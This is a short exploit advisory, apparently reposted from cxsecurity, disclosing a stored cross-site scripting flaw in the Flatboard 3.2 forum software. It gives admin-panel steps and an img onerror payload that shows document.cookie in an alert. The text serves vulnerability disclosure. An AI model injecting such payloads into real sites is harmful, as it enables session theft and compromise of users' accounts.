Flatboard 3.2 Cross Site Scripting
2024-6-25 03:40:2 Author: cxsecurity.com(查看原文) 阅读量:4 收藏

# Exploit Title: Flatboard v3.2 - Stored XSS # Date: 2024-06-23 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://flatboard.org/ # Version: 3.2 ---------------------------------------------------------------------------------------------------- 1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum 2-Click Add Forum and write in Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> 3-Save it , you will be see alert button



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024060056
如有侵权请联系:admin#unsafe.sh